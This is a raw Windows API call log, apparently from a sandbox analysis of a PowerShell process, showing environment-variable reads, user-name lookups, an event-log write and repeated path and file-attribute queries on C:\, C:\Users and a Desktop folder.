	[0040.904] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.904] GetLastError () returned 0xcb
	[0040.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.906] GetLastError () returned 0xcb
	[0040.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25df74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0040.908] GetLastError () returned 0xcb
	[0040.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0040.908] GetLastError () returned 0xcb
	[0040.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0040.908] GetLastError () returned 0xcb
	[0040.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0040.908] GetLastError () returned 0xcb
	[0040.959] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x191318, nSize=0x25e574 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x25e574) returned 0x1
	[0040.960] GetLastError () returned 0x3
	[0040.960] GetUserNameW (in: lpBuffer=0x190b58, pcbBuffer=0x25e57c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x25e57c) returned 1
	[0040.960] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a939e8*="Certificate", lpRawData=0x2a938a4) returned 1
	[0040.961] GetLastError () returned 0x0
	[0040.971] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.971] GetLastError () returned 0xcb
	[0040.975] GetLogicalDrives () returned 0x4
	[0040.975] GetLastError () returned 0xcb
	[0040.975] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25e0ec, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0040.975] GetLastError () returned 0xcb
	[0040.975] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0040.975] GetLastError () returned 0xcb
	[0040.976] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x190b58 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop") returned 0x1d
	[0040.976] GetLastError () returned 0xcb
	[0040.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.978] GetLastError () returned 0xcb
	[0040.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.978] GetLastError () returned 0xcb
	[0041.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.003] GetLastError () returned 0xcb
	[0041.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.005] GetLastError () returned 0xcb
	[0041.006] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", nBufferLength=0x105, lpBuffer=0x25df34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x0) returned 0x1d
	[0041.006] GetLastError () returned 0xcb
	[0041.006] SetErrorMode (uMode=0x1) returned 0x1
	[0041.006] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x2a9b1d8 | out: lpFileInformation=0x2a9b1d8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xfa927620, ftLastAccessTime.dwHighDateTime=0x1d50a69, ftLastWriteTime.dwLowDateTime=0xfa927620, ftLastWriteTime.dwHighDateTime=0x1d50a69, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0041.006] GetLastError () returned 0xcb
	[0041.006] SetErrorMode (uMode=0x1) returned 0x1
	[0041.006] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", nBufferLength=0x105, lpBuffer=0x25df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x0) returned 0x1d
	[0041.006] GetLastError () returned 0xcb
	[0041.006] SetErrorMode (uMode=0x1) returned 0x1
	[0041.006] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x2a9b37c | out: lpFileInformation=0x2a9b37c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xfa927620, ftLastAccessTime.dwHighDateTime=0x1d50a69, ftLastWriteTime.dwLowDateTime=0xfa927620, ftLastWriteTime.dwHighDateTime=0x1d50a69, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0041.006] GetLastError () returned 0xcb
	[0041.006] SetErrorMode (uMode=0x1) returned 0x1
	[0041.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.012] GetLastError () returned 0xcb
	[0041.026] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", nBufferLength=0x105, lpBuffer=0x25e084, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x0) returned 0x1d
	[0041.026] GetLastError () returned 0xcb
	[0041.027] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25e000, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0041.027] GetLastError () returned 0xcb
	[0041.027] SetErrorMode (uMode=0x1) returned 0x1
	[0041.027] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x25e480 | out: lpFileInformation=0x25e480*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0041.027] GetLastError () returned 0xcb
	[0041.027] SetErrorMode (uMode=0x1) returned 0x1
	[0041.027] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25e000, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0041.027] GetLastError () returned 0xcb
	[0041.027] SetErrorMode (uMode=0x1) returned 0x1
	[0041.027] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x25e480 | out: lpFileInformation=0x25e480*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0041.027] GetLastError () returned 0xcb
	[0041.027] SetErrorMode (uMode=0x1) returned 0x1
	[0041.027] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25e014, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0041.027] GetLastError () returned 0xcb
	[0041.027] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0041.028] GetLastError () returned 0xcb
	[0041.028] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25e000, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0041.028] GetLastError () returned 0xcb
	[0041.028] SetErrorMode (uMode=0x1) returned 0x1
	[0041.028] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x25e480 | out: lpFileInformation=0x25e480*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc16c9120, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc16c9120, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0041.028] GetLastError () returned 0xcb
	[0041.028] SetErrorMode (uMode=0x1) returned 0x1
	[0041.028] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25e000, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0041.028] GetLastError () returned 0xcb
	[0041.028] SetErrorMode (uMode=0x1) returned 0x1
	[0041.028] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x25e480 | out: lpFileInformation=0x25e480*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc16c9120, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc16c9120, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0041.028] GetLastError () returned 0xcb
	[0041.028] SetErrorMode (uMode=0x1) returned 0x1
	[0041.028] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25e014, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0041.028] GetLastError () returned 0xcb
	[0041.042] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x25dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0041.042] GetLastError () returned 0xcb
	[0041.042] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc", nBufferLength=0x105, lpBuffer=0x25e000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc", lpFilePart=0x0) returned 0x15
	[0041.042] GetLastError () returned 0xcb
	[0041.042] SetErrorMode (uMode=0x1) returned 0x1
	[0041.042] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc" (normalized: "c:\\users\\2xc7u663gxwc"), fInfoLevelId=0x0, lpFileInformation=0x25e480 | out: lpFileInformation=0x25e480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0041.042] GetLastError () returned 0xcb
	[0041.042] SetErrorMode (uMode=0x1) returned 0x1
	[0041.042] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc", nBufferLength=0x105, lpBuffer=0x25e000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc", lpFilePart=0x0) returned 0x15
	[0041.042] GetLastError () returned 0xcb
	[0041.042] SetErrorMode (uMode=0x1) returned 0x1
	[0041.042] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc" (normalized: "c:\\users\\2xc7u663gxwc"), fInfoLevelId=0x0, lpFileInformation=0x25e480 | out: lpFileInformation=0x25e480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0041.042] GetLastError () returned 0xcb
	[0041.042] SetErrorMode (uMode=0x1) returned 0x1
	[0041.042] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc", nBufferLength=0x105, lpBuffer=0x25e014, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc", lpFilePart=0x0) returned 0x15
	[0041.042] GetLastError () returned 0xcb
	[0041.042] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\.", nBufferLength=0x105, lpBuffer=0x25dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc", lpFilePart=0x0) returned 0x15
	[0041.042] GetLastError () returned 0xcb
	[0041.042] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", nBufferLength=0x105, lpBuffer=0x25e000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x0) returned 0x1d
	[0041.042] GetLastError () returned 0xcb
	[0041.042] SetErrorMode (uMode=0x1) returned 0x1
	[0041.042] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x25e480 | out: lpFileInformation=0x25e480*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xfa927620, ftLastAccessTime.dwHighDateTime=0x1d50a69, ftLastWriteTime.dwLowDateTime=0xfa927620, ftLastWriteTime.dwHighDateTime=0x1d50a69, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0041.043] GetLastError () returned 0xcb
	[0041.043] SetErrorMode (uMode=0x1) returned 0x1
	[0041.043] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", nBufferLength=0x105, lpBuffer=0x25e000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x0) returned 0x1d
	[0041.043] GetLastError () returned 0xcb
	[0041.043] SetErrorMode (uMode=0x1) returned 0x1
	[0041.043] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x25e480 | out: lpFileInformation=0x25e480*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xfa927620, ftLastAccessTime.dwHighDateTime=0x1d50a69, ftLastWriteTime.dwLowDateTime=0xfa927620, ftLastWriteTime.dwHighDateTime=0x1d50a69, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0041.043] GetLastError () returned 0xcb
	[0041.043] SetErrorMode (uMode=0x1) returned 0x1
	[0041.043] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", nBufferLength=0x105, lpBuffer=0x25e014, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x0) returned 0x1d
	[0041.043] GetLastError () returned 0xcb
	[0041.043] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x25dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x0) returned 0x1d
	[0041.043] GetLastError () returned 0xcb
	[0041.043] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0041.043] GetLastError () returned 0xcb
	[0041.043] SetErrorMode (uMode=0x1) returned 0x1
	[0041.043] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x25e48c | out: lpFileInformation=0x25e48c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc16c9120, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc16c9120, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0041.043] GetLastError () returned 0xcb
	[0041.043] SetErrorMode (uMode=0x1) returned 0x1
	[0041.043] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0041.043] GetLastError () returned 0xcb
	[0041.043] SetErrorMode (uMode=0x1) returned 0x1
	[0041.043] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x25e48c | out: lpFileInformation=0x25e48c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc16c9120, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc16c9120, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0041.043] GetLastError () returned 0xcb
	[0041.043] SetErrorMode (uMode=0x1) returned 0x1
	[0041.044] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25e020, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0041.044] GetLastError () returned 0xcb
	[0041.044] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x25dfbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0041.044] GetLastError () returned 0xcb
	[0041.044] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc", lpFilePart=0x0) returned 0x15
	[0041.044] GetLastError () returned 0xcb
	[0041.044] SetErrorMode (uMode=0x1) returned 0x1
	[0041.044] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc" (normalized: "c:\\users\\2xc7u663gxwc"), fInfoLevelId=0x0, lpFileInformation=0x25e48c | out: lpFileInformation=0x25e48c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0041.044] GetLastError () returned 0xcb
	[0041.044] SetErrorMode (uMode=0x1) returned 0x1
	[0041.044] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc", lpFilePart=0x0) returned 0x15
	[0041.044] GetLastError () returned 0xcb
	[0041.044] SetErrorMode (uMode=0x1) returned 0x1
	[0041.044] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc" (normalized: "c:\\users\\2xc7u663gxwc"), fInfoLevelId=0x0, lpFileInformation=0x25e48c | out: lpFileInformation=0x25e48c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0041.044] GetLastError () returned 0xcb
	[0041.044] SetErrorMode (uMode=0x1) returned 0x1
	[0041.044] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc", nBufferLength=0x105, lpBuffer=0x25e020, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc", lpFilePart=0x0) returned 0x15
	[0041.044] GetLastError () returned 0xcb
	[0041.044] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\.", nBufferLength=0x105, lpBuffer=0x25dfbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc", lpFilePart=0x0) returned 0x15
	[0041.045] GetLastError () returned 0xcb
	[0041.045] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x0) returned 0x1d
	[0041.045] GetLastError () returned 0xcb
	[0041.045] SetErrorMode (uMode=0x1) returned 0x1
	[0041.045] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x25e48c | out: lpFileInformation=0x25e48c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xfa927620, ftLastAccessTime.dwHighDateTime=0x1d50a69, ftLastWriteTime.dwLowDateTime=0xfa927620, ftLastWriteTime.dwHighDateTime=0x1d50a69, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0041.045] GetLastError () returned 0xcb
	[0041.045] SetErrorMode (uMode=0x1) returned 0x1
	[0041.045] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x0) returned 0x1d
	[0041.045] GetLastError () returned 0xcb
	[0041.045] SetErrorMode (uMode=0x1) returned 0x1
	[0041.045] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x25e48c | out: lpFileInformation=0x25e48c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xfa927620, ftLastAccessTime.dwHighDateTime=0x1d50a69, ftLastWriteTime.dwLowDateTime=0xfa927620, ftLastWriteTime.dwHighDateTime=0x1d50a69, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0041.045] GetLastError () returned 0xcb
	[0041.045] SetErrorMode (uMode=0x1) returned 0x1
	[0041.045] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", nBufferLength=0x105, lpBuffer=0x25e020, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x0) returned 0x1d
	[0041.045] GetLastError () returned 0xcb
	[0041.045] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x25dfbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x0) returned 0x1d
	[0041.045] GetLastError () returned 0xcb
	[0041.049] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", nBufferLength=0x105, lpBuffer=0x25e0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x0) returned 0x1d
	[0041.049] GetLastError () returned 0xcb
	[0041.049] SetErrorMode (uMode=0x1) returned 0x1
	[0041.049] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x2aa55ec | out: lpFileInformation=0x2aa55ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xfa927620, ftLastAccessTime.dwHighDateTime=0x1d50a69, ftLastWriteTime.dwLowDateTime=0xfa927620, ftLastWriteTime.dwHighDateTime=0x1d50a69, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0041.050] GetLastError () returned 0xcb
	[0041.050] SetErrorMode (uMode=0x1) returned 0x1
	[0041.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e124, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.051] GetLastError () returned 0xcb
	[0041.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.051] GetLastError () returned 0xcb
	[0041.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.051] GetLastError () returned 0xcb
	[0041.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.117] GetLastError () returned 0xcb
	[0041.178] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x191318, nSize=0x25e678 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x25e678) returned 0x1
	[0041.179] GetLastError () returned 0xcb
